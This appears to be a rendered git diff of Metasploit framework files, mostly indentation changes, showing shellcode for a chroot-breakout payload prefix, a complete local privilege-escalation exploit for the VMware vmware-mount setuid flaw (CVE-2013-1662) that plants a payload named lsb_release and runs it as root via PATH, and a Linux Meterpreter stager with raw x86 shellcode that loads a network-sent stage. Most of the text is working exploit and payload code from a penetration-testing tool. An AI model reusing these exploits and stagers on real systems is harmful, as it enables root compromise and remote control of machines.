pre << "\x6a\x50" # push 0x50 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
||||
return (pre + buf + app)
|
||||
end
|
||||
return (pre + buf + app)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -16,48 +16,48 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info, {
|
||||
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
|
||||
'Description' => %q{
|
||||
VMWare Workstation (up to and including 9.0.2 build-1031769)
|
||||
and Player have a setuid executable called vmware-mount that
|
||||
invokes lsb_release in the PATH with popen(3). Since PATH is
|
||||
user-controlled, and the default system shell on
|
||||
Debian-derived distributions does not drop privs, we can put
|
||||
an arbitrary payload in an executable called lsb_release and
|
||||
have vmware-mount happily execute it as root for us.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Vulnerability discovery and PoC
|
||||
'egypt' # Metasploit module
|
||||
],
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[ 'CVE', '2013-1662' ],
|
||||
[ 'OSVDB', '96588' ],
|
||||
[ 'BID', '61966'],
|
||||
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
|
||||
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
|
||||
],
|
||||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
end
|
||||
def initialize(info={})
|
||||
super( update_info( info, {
|
||||
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
|
||||
'Description' => %q{
|
||||
VMWare Workstation (up to and including 9.0.2 build-1031769)
|
||||
and Player have a setuid executable called vmware-mount that
|
||||
invokes lsb_release in the PATH with popen(3). Since PATH is
|
||||
user-controlled, and the default system shell on
|
||||
Debian-derived distributions does not drop privs, we can put
|
||||
an arbitrary payload in an executable called lsb_release and
|
||||
have vmware-mount happily execute it as root for us.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Vulnerability discovery and PoC
|
||||
'egypt' # Metasploit module
|
||||
],
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[ 'CVE', '2013-1662' ],
|
||||
[ 'OSVDB', '96588' ],
|
||||
[ 'BID', '61966'],
|
||||
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
|
||||
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
|
||||
],
|
||||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
if setuid?("/usr/bin/vmware-mount")
|
||||
|
@ -72,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||
end
|
||||
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
|
||||
cmd_exec("chmod +x lsb_release")
|
||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||
|
|
|
@ -11,8 +11,8 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
|
|
|
@ -11,96 +11,96 @@ require 'msf/base/sessions/meterpreter_options'
|
|||
require 'rex/elfparsey'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Staged meterpreter server',
|
||||
'Author' => ['PKS', 'egypt'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Staged meterpreter server',
|
||||
'Author' => ['PKS', 'egypt'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
|
||||
register_options([
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
register_options([
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
end
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
end
|
||||
|
||||
def elf2bin(payload)
|
||||
# XXX, not working. Use .c version
|
||||
def elf2bin(payload)
|
||||
# XXX, not working. Use .c version
|
||||
|
||||
# This code acts as a mini elf parser / memory layout linker.
|
||||
# It will return what a elf file looks like once loaded in memory
|
||||
# This code acts as a mini elf parser / memory layout linker.
|
||||
# It will return what a elf file looks like once loaded in memory
|
||||
|
||||
mem = "\x00" * (4 * 1024 * 1024)
|
||||
used = 0
|
||||
mem = "\x00" * (4 * 1024 * 1024)
|
||||
used = 0
|
||||
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
|
||||
elf.program_header.each { |hdr|
|
||||
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
|
||||
print_status("Found PT_LOAD")
|
||||
fileidx = hdr.p_offset & (~4095)
|
||||
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
|
||||
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
|
||||
elf.program_header.each { |hdr|
|
||||
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
|
||||
print_status("Found PT_LOAD")
|
||||
fileidx = hdr.p_offset & (~4095)
|
||||
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
|
||||
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
|
||||
|
||||
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
|
||||
used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
|
||||
end
|
||||
}
|
||||
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
|
||||
used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
|
||||
end
|
||||
}
|
||||
|
||||
# Maybe at some stage zero out elf header / program headers in case tools
|
||||
# try to look for them
|
||||
# Maybe at some stage zero out elf header / program headers in case tools
|
||||
# try to look for them
|
||||
|
||||
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
|
||||
return mem[0, used]
|
||||
end
|
||||
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
|
||||
return mem[0, used]
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
# Does a mmap() / read() loop of a user specified length, then
|
||||
# jumps to the entry point (the \x5a's)
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
# Does a mmap() / read() loop of a user specified length, then
|
||||
# jumps to the entry point (the \x5a's)
|
||||
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
|
||||
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
|
||||
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
|
||||
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
|
||||
"\xd1\xff\xff\xff"
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
|
||||
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
|
||||
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
|
||||
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
|
||||
"\xd1\xff\xff\xff"
|
||||
|
||||
|
||||
# Patch in debug options
|
||||
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
|
||||
# Patch in debug options
|
||||
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
|
||||
|
||||
# Patch entry point
|
||||
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
|
||||
# Patch entry point
|
||||
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
|
||||
|
||||
# Maybe in the future patch in base.
|
||||
# Maybe in the future patch in base.
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
|
||||
# Send length of payload
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
return true
|
||||
# Send length of payload
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
return true
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
def generate_stage
|
||||
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
|
||||
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
|
||||
def generate_stage
|
||||
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
|
||||
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
|
||||
|
||||
met = File.open(file, "rb") {|f|
|
||||
f.read(f.stat.size)
|
||||
|
|
|
@ -10,8 +10,8 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
|
|
Loading…
Reference in New Issue